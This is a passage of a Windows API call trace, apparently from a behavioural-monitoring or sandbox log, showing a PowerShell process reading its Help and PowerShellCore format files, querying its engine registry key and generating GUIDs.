	[0546.246] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.246] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.246] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.246] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.246] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.247] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.249] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.249] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.250] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.250] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.250] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.250] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.251] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.251] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.251] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.252] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.252] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.252] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.253] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.253] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.253] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.254] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.258] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.258] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.259] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.259] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.259] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.260] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.260] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.260] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.260] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.261] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.261] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.261] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.261] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.262] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.262] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.262] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.262] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.263] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.263] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.263] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.263] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.264] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.264] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.264] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.264] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.265] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.265] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.265] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.265] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.266] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.266] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0xf37, lpOverlapped=0x0) returned 1
	[0546.266] ReadFile (in: hFile=0x31c, lpBuffer=0x369e73f, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369e73f*, lpNumberOfBytesRead=0x24d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0546.266] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0546.267] CloseHandle (hObject=0x31c) returned 1
	[0546.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0546.267] SetErrorMode (uMode=0x1) returned 0x1
	[0546.267] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d060 | out: lpFileInformation=0x24d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0546.267] SetErrorMode (uMode=0x1) returned 0x1
	[0546.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0546.267] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d148 | out: phkResult=0x24d148*=0x31c) returned 0x0
	[0546.267] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d0cc, lpData=0x0, lpcbData=0x24d0c8*=0x0 | out: lpType=0x24d0cc*=0x1, lpData=0x0, lpcbData=0x24d0c8*=0x56) returned 0x0
	[0546.268] CoTaskMemAlloc (cb=0x5a) returned 0x19a370
	[0546.268] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d09c, lpData=0x19a370, lpcbData=0x24d098*=0x56 | out: lpType=0x24d09c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d098*=0x56) returned 0x0
	[0546.268] CoTaskMemFree (pv=0x19a370) 
	[0546.268] RegCloseKey (hKey=0x31c) returned 0x0
	[0546.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0546.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0547.057] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x1afafdf3, Data2=0x4f3a, Data3=0x44cf, Data4=([0]=0xad, [1]=0xa7, [2]=0x38, [3]=0xee, [4]=0xce, [5]=0xa3, [6]=0xae, [7]=0xca))) returned 0x0
	[0547.058] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xdff36e7c, Data2=0x28ff, Data3=0x47bf, Data4=([0]=0x82, [1]=0x4f, [2]=0x98, [3]=0x79, [4]=0xf1, [5]=0xf3, [6]=0x44, [7]=0xa0))) returned 0x0
	[0547.104] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x4f062cb4, Data2=0x8d48, Data3=0x47b3, Data4=([0]=0x92, [1]=0xf2, [2]=0x7e, [3]=0xad, [4]=0x12, [5]=0x71, [6]=0x5a, [7]=0x45))) returned 0x0
	[0547.105] VirtualQuery (in: lpAddress=0x24b380, lpBuffer=0x24c240, dwLength=0x30 | out: lpBuffer=0x24c240*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0547.107] VirtualQuery (in: lpAddress=0x24b410, lpBuffer=0x24c2d0, dwLength=0x30 | out: lpBuffer=0x24c2d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0547.113] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xe21675fe, Data2=0xafe5, Data3=0x446b, Data4=([0]=0x9c, [1]=0x42, [2]=0x9, [3]=0x66, [4]=0x21, [5]=0x9f, [6]=0x93, [7]=0xf8))) returned 0x0
	[0548.025] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xd43d1683, Data2=0xcd4c, Data3=0x4d3e, Data4=([0]=0xa9, [1]=0x63, [2]=0xc7, [3]=0x9, [4]=0xb8, [5]=0xfd, [6]=0xef, [7]=0x98))) returned 0x0
	[0548.026] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xaad5e630, Data2=0xc86f, Data3=0x4371, Data4=([0]=0x8e, [1]=0x98, [2]=0xd8, [3]=0x76, [4]=0x16, [5]=0x3b, [6]=0xeb, [7]=0x90))) returned 0x0
	[0549.023] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x7fbc89e4, Data2=0x478c, Data3=0x4d3b, Data4=([0]=0xb5, [1]=0x85, [2]=0xe2, [3]=0x5d, [4]=0x7e, [5]=0xf0, [6]=0x7e, [7]=0xb1))) returned 0x0
	[0549.024] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x77786772, Data2=0x728f, Data3=0x428a, Data4=([0]=0xac, [1]=0x84, [2]=0x65, [3]=0x38, [4]=0x28, [5]=0x19, [6]=0x39, [7]=0x8b))) returned 0x0
	[0549.024] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xf354c642, Data2=0x8161, Data3=0x41fa, Data4=([0]=0x9e, [1]=0x27, [2]=0xb4, [3]=0x47, [4]=0x5c, [5]=0xbe, [6]=0x46, [7]=0xef))) returned 0x0
	[0549.024] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xc3e611c0, Data2=0x9847, Data3=0x496c, Data4=([0]=0x95, [1]=0x99, [2]=0xd0, [3]=0x7f, [4]=0x24, [5]=0xa7, [6]=0x79, [7]=0x5a))) returned 0x0
	[0549.024] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xaf5c77ad, Data2=0x90c6, Data3=0x41f9, Data4=([0]=0x9e, [1]=0x6f, [2]=0x12, [3]=0xe9, [4]=0xfe, [5]=0x35, [6]=0xd1, [7]=0x74))) returned 0x0
	[0549.025] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x4a9de416, Data2=0x89fd, Data3=0x40d2, Data4=([0]=0xaa, [1]=0x20, [2]=0x17, [3]=0xbe, [4]=0x51, [5]=0x76, [6]=0x7d, [7]=0x62))) returned 0x0
	[0549.025] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xc85e69fa, Data2=0x44d3, Data3=0x4321, Data4=([0]=0x93, [1]=0xf9, [2]=0xed, [3]=0xfd, [4]=0x36, [5]=0xd7, [6]=0xf9, [7]=0x53))) returned 0x0
	[0549.025] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x3b0e784b, Data2=0xe6b7, Data3=0x4c18, Data4=([0]=0x9b, [1]=0x84, [2]=0xc7, [3]=0x59, [4]=0xf5, [5]=0x72, [6]=0x51, [7]=0x25))) returned 0x0
	[0549.025] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xbd630eb9, Data2=0x42b0, Data3=0x4dda, Data4=([0]=0xaa, [1]=0xcf, [2]=0x5e, [3]=0xf8, [4]=0x44, [5]=0xc7, [6]=0x5f, [7]=0x6b))) returned 0x0
	[0549.026] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x57f59ac, Data2=0x96b0, Data3=0x4496, Data4=([0]=0x80, [1]=0x71, [2]=0x7a, [3]=0xee, [4]=0xd8, [5]=0x83, [6]=0x0, [7]=0xf3))) returned 0x0
	[0549.027] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xb1daa7ce, Data2=0x173d, Data3=0x444c, Data4=([0]=0xa8, [1]=0xbf, [2]=0x85, [3]=0x47, [4]=0xb9, [5]=0x22, [6]=0xac, [7]=0x84))) returned 0x0
	[0549.028] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xe952f888, Data2=0x665c, Data3=0x4c41, Data4=([0]=0xa9, [1]=0x31, [2]=0x81, [3]=0x67, [4]=0x1e, [5]=0x21, [6]=0x16, [7]=0xea))) returned 0x0
	[0549.029] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xebc5b14f, Data2=0x796b, Data3=0x4ae5, Data4=([0]=0xba, [1]=0x8a, [2]=0x4c, [3]=0x4f, [4]=0x44, [5]=0x30, [6]=0xe1, [7]=0x1a))) returned 0x0
	[0549.029] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xd2fdd437, Data2=0x2a8e, Data3=0x42a4, Data4=([0]=0xa1, [1]=0xbb, [2]=0xd, [3]=0x5b, [4]=0xf9, [5]=0xba, [6]=0xa1, [7]=0xb8))) returned 0x0
	[0549.029] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x28e4d273, Data2=0x2cfe, Data3=0x4a7a, Data4=([0]=0x9e, [1]=0x4, [2]=0x5a, [3]=0xc6, [4]=0xdc, [5]=0x66, [6]=0x2e, [7]=0xca))) returned 0x0
	[0549.029] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x2e71ec4e, Data2=0x6ede, Data3=0x4ea9, Data4=([0]=0x9d, [1]=0xd0, [2]=0x8a, [3]=0xe0, [4]=0x3d, [5]=0xa, [6]=0x2a, [7]=0x86))) returned 0x0
	[0549.030] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xd997ceaf, Data2=0x481d, Data3=0x4341, Data4=([0]=0x91, [1]=0x3b, [2]=0x70, [3]=0x35, [4]=0xe1, [5]=0xcc, [6]=0x98, [7]=0x74))) returned 0x0
	[0549.030] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x6710caaf, Data2=0x21a4, Data3=0x4bef, Data4=([0]=0x94, [1]=0x23, [2]=0x64, [3]=0x38, [4]=0x72, [5]=0xc5, [6]=0x61, [7]=0xff))) returned 0x0
	[0549.030] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x2875da90, Data2=0x91cd, Data3=0x4046, Data4=([0]=0x95, [1]=0xa1, [2]=0xf2, [3]=0xc3, [4]=0x1, [5]=0x9e, [6]=0x1b, [7]=0x74))) returned 0x0
	[0549.030] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0549.030] GetFileType (hFile=0x31c) returned 0x1
	[0549.030] SetErrorMode (uMode=0x1) returned 0x1
	[0549.031] GetFileType (hFile=0x31c) returned 0x1
	[0549.031] ReadFile (in: hFile=0x31c, lpBuffer=0x38d31c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x38d31c8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0549.032] ReadFile (in: hFile=0x31c, lpBuffer=0x38d31c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x38d31c8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
